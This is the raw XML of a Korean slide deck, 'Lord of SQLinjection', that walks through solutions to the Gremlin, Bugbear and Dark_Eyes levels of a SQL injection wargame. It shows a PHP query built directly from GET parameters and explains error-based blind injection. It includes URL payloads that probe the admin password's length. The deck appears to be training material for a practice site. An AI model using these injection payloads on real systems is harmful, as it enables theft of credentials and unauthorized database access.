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88" r:id="rId2"/>
    <p:sldId id="489" r:id="rId3"/>
    <p:sldId id="499" r:id="rId4"/>
    <p:sldId id="491" r:id="rId5"/>
    <p:sldId id="500" r:id="rId6"/>
    <p:sldId id="501" r:id="rId7"/>
    <p:sldId id="497" r:id="rId8"/>
    <p:sldId id="502" r:id="rId9"/>
    <p:sldId id="503" r:id="rId10"/>
    <p:sldId id="504" r:id="rId11"/>
    <p:sldId id="505" r:id="rId12"/>
    <p:sldId id="498" r:id="rId13"/>
    <p:sldId id="510" r:id="rId14"/>
    <p:sldId id="507" r:id="rId15"/>
    <p:sldId id="508" r:id="rId16"/>
    <p:sldId id="509" r:id="rId17"/>
    <p:sldId id="496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98989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55" autoAdjust="0"/>
    <p:restoredTop sz="86477" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="75" d="100"/>
          <a:sy n="75" d="100"/>
        </p:scale>
        <p:origin x="424" y="45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Autofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="44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3068960"/>
            <a:ext cx="6701041" cy="576064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r">
              <a:buNone/>
              <a:defRPr sz="3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7DCD88-EAB4-48F3-A170-B9D454253E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85975" y="3644900"/>
            <a:ext cx="6700838" cy="431800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r">
              <a:buNone/>
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr algn="r">
              <a:defRPr b="1">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr algn="r">
              <a:defRPr b="1">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr algn="r">
              <a:defRPr b="1">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr algn="r">
              <a:defRPr b="1">
                <a:solidFill>
                  <a:srgbClr val="898989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655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  <a:defRPr sz="2350" b="1">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2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2pPr>
            <a:lvl3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3pPr>
            <a:lvl4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4pPr>
            <a:lvl5pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:defRPr sz="1800" b="1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9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74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174" y="71414"/>
            <a:ext cx="8738544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4143404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928670"/>
            <a:ext cx="4286280" cy="5286412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12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6064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54269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63497" y="6515818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45786" y="6515817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30888" y="6515816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+mn-ea"/>
                <a:ea typeface="+mn-ea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8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4" r:id="rId2"/>
    <p:sldLayoutId id="2147483688" r:id="rId3"/>
    <p:sldLayoutId id="2147483703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73E25-D287-4561-9DA2-BC83B06C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664" y="2420888"/>
            <a:ext cx="6929486" cy="642942"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Lord of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>SQLinjection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236F5-4D4E-4177-846D-5ACE9F690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7744" y="5301208"/>
            <a:ext cx="6701041" cy="576064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>박 성 유</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="195034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13 (Bugbear)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10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59ADBD-8CBE-407F-999B-9DE2BF59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897891"/>
            <a:ext cx="7524328" cy="5062217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0B7A745-F749-44CE-88A1-3BB3CF59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6042447"/>
            <a:ext cx="8715436" cy="488143"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>파이썬 코드에서는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>%23 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>대신 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>를 써야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D69E67-8912-4857-9B0F-262C7941C12F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1403648" y="2996952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D07B2C-3AC0-4436-94AF-A2262A21BFEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1691680" y="3691787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D3E3F1-254B-4CDF-8439-CCD1AFA315E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1403648" y="2498142"/>
            <a:ext cx="54006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D321DF-94C7-4C09-95A9-05098EAA11BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="5085184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902F71-6858-4A26-ACB6-A7DE3CD9959B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="799799" y="5744084"/>
            <a:ext cx="81987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86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13 (Bugbear)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11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E95588-5218-46CA-86D9-5664AFF3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298000" cy="5191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AAA524-11CE-4454-8C44-18DBEF6C8579}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7422479" y="1168302"/>
            <a:ext cx="1253978" cy="3164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264586-1CB1-4EBB-A4CD-4D60F994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88" y="1781816"/>
            <a:ext cx="7427711" cy="46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3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368302632" descr="EMB0000217c4390">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C06E884E-3D91-4D02-B50E-E8561C6C4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1243"/>
            <a:ext cx="8496944" cy="436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A3FD04-83BF-4D1D-BA6A-6127E0AB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22 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>Dark_Eyes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>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5363B-66D9-4AAB-9927-833F30AC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12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B2EC6F-C0CA-4FF3-BF18-D4B99D546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5" y="398115"/>
            <a:ext cx="10838650" cy="58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CABDB4-DC7D-476D-B457-F82A414D1454}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467544" y="3861048"/>
            <a:ext cx="1980000" cy="180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C5F922A-3D1D-4562-801E-E61136399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5445224"/>
            <a:ext cx="8496944" cy="76985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문 대신 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>mysql_error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>()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mysql_error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>가 발생했을 때 빈 페이지가 출력된다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	-&gt; Error Based Blind </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>Sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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EC69F1-7529-4BD4-9304-830EBF6A2DBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="491620" y="4270811"/>
            <a:ext cx="5808571" cy="70759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2E69B370-619E-44C5-B2B4-633F82B841D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="323528" y="5445224"/>
            <a:ext cx="8496944" cy="76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13</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>번과 마찬가지로 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>의 비밀번호를 정확히 구해야 한다</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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8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build="p"/>
      <p:bldP spid="9" grpId="1" build="p"/>
      <p:bldP spid="13" grpId="0" animBg="1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22 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>Dark_Eyes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AECF-D173-429D-B32A-09F5AEBA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원리</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>쿼리문이 참일 때 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>현재 페이지 유지</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>쿼리문이 거짓일 때 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>-&gt; error </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>페이지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문을 통해 구현할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r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>조건문</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, true </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>일 때 반환 값</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, false </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>일 때 반환 값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Error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>를 발생시키는 구문이 필요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&lt;Error Based Blind </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>Sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> Injection&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>	반환 값 개수 오류 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>한 개 값의 자리에 두 개 이상의 값 반환 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>ex) select 1 union select 2 =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>반환 값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/>
              <a:t>ex) select 1 union select 1 =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>반환 값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13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59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22 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>Dark_Eyes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14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DEC52-A136-4DCE-ACDA-3A9D992E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Blind </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>Sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>을 통해 비밀번호 길이 구하기</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>?pw=' or id='admin' and (select length(pw)&lt;10 union select 1) %23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?pw=' or id='admin' and (select length(pw)&lt;8 union select 1) %23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?pw=' or id='admin' and (select length(pw)=9 union select 1) %23</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR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695A07-8F68-403F-8CD9-0A4DB545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35979"/>
            <a:ext cx="10238344" cy="58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68332656" descr="EMB0000217c43ae">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C4C6B39-FEFF-4E89-B536-8B3C2AC25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53484"/>
            <a:ext cx="8243972" cy="225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1012FCE-D158-4410-B575-DC643F5C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18F676B-15D4-4F28-BEB1-7B83D31B6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4908709"/>
            <a:ext cx="11380157" cy="58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3" name="_x368336544" descr="EMB0000217c43b4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99801957-35D0-483D-8022-1D8BC1DE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5" y="4603996"/>
            <a:ext cx="8239689" cy="61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A5A36F6F-2238-483E-9F4F-D059076D2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67" y="4685660"/>
            <a:ext cx="9180729" cy="58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5" name="_x368303352" descr="EMB0000217c43b7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC135D6C-59A7-4774-914E-5E3086C9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8" y="5693665"/>
            <a:ext cx="8239676" cy="6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1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22 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>Dark_Eyes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15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78655A-C3C7-451F-967C-4D30344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7" y="908720"/>
            <a:ext cx="8710844" cy="42484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FCE85E-0A33-4AA4-8BF3-B3EC95046D80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899592" y="2160000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9F31C8-A02D-4FE8-A10F-0BFB5C3B60BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1619672" y="2569248"/>
            <a:ext cx="6120680" cy="427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32BADF-DEA9-4FCE-B6C5-179DC5538854}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="912581" y="3350877"/>
            <a:ext cx="200323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DA696B-C6D9-4655-8C76-B23D07EB6782}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1259633" y="3576073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C0DE60-6384-4FA7-9CFF-9274E2079A3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258014" y="4150608"/>
            <a:ext cx="128965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E07052-4795-4ECB-AB02-D635D73A6235}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="227787" y="4904149"/>
            <a:ext cx="81582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98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6877282-416F-46D5-AACB-852F4F43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1" y="1043947"/>
            <a:ext cx="8331205" cy="5098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22 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>Dark_Eyes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16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9B1E4B-CD6A-427E-8580-BF9C2699D01E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7494486" y="1168303"/>
            <a:ext cx="1253978" cy="3164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89967A-DC6F-4B9A-9EBA-47E1122D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2" y="1737376"/>
            <a:ext cx="7551936" cy="46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17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65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40DC-E28D-485D-903F-39D501AC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280D4-FD82-44C8-ADCD-27798FFF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05" y="1386747"/>
            <a:ext cx="3744416" cy="4084506"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>워게임</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 풀이 현황</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Level 1 (Gremlin)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Level 13 (Bugbear)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Level 22 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>Dark_Eyes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43558-E2EE-4146-A26C-0EE8B8CC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3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워게임</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 풀이 현황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793B06-457C-4415-8D1B-C2F8285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63" y="1268760"/>
            <a:ext cx="3661474" cy="4841282"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="십자형 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758E53A-FC8F-4CC2-A86A-661E09A2B8A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2633649">
            <a:off x="4224283" y="4965832"/>
            <a:ext cx="467069" cy="467069"/>
          </a:xfrm>
          <a:prstGeom prst="plus">
            <a:avLst>
              <a:gd name="adj" fmla="val 3740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십자형 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F38DD9F-5ED2-47B4-80AF-55ABA84AAB97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2633649">
            <a:off x="4872355" y="4965832"/>
            <a:ext cx="467069" cy="467069"/>
          </a:xfrm>
          <a:prstGeom prst="plus">
            <a:avLst>
              <a:gd name="adj" fmla="val 3740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89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1002F05-C99F-46AB-BAE6-D2C8C893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2" y="983299"/>
            <a:ext cx="8514329" cy="3755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A3FD04-83BF-4D1D-BA6A-6127E0AB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 (Gremlin)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5CBC9-755F-4BE1-8E03-16A04571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42" y="5019062"/>
            <a:ext cx="8514329" cy="1362266"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>preg_match</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>패턴‘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) : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>문자열이 주어진 패턴과 일치하는지 검사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sz="1800" dirty="0"/>
              <a:t>문자를 필터링하는데 사용한다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ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>이 문제에서는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>prob, _, ., \</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t> 가 필터링 되었다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5363B-66D9-4AAB-9927-833F30AC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CABDB4-DC7D-476D-B457-F82A414D1454}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467544" y="3284984"/>
            <a:ext cx="4824536" cy="3600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F15B17-F5F0-42F6-B23B-F376C56F3D79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467544" y="3799964"/>
            <a:ext cx="3888432" cy="1549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1E884D-350F-4C5F-9A0D-B08596D80B44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467544" y="3960000"/>
            <a:ext cx="3672408" cy="16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A72633-E5D7-4C40-9EB2-3A823FDB7297}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467544" y="3636000"/>
            <a:ext cx="5976664" cy="16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4EF5F1-BD13-4899-9DA9-8ECD57C3AECF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467544" y="4127496"/>
            <a:ext cx="2592288" cy="16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EACEB19-6463-4D86-BA6C-EE6BD72C16AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="305348" y="5019062"/>
            <a:ext cx="8514329" cy="136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select id from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>prob_gremlin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where id='{$_GET[id]}' and pw='{$_GET[pw]}'";</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>     - URL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>에 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>get </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>방식으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>와 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>pw </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>값을 전달할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="16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5278041-263F-4E1C-BAFC-432AF6FD49A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="306143" y="5019062"/>
            <a:ext cx="8514329" cy="136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 echo "&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>hr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>&gt;query : &lt;strong&gt;{$query}&lt;/strong&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>hr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&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>      - </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>문자열을 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>body </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>부분에 출력한다</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="16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99C65DB-62F8-42CB-9E00-F462B33987EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
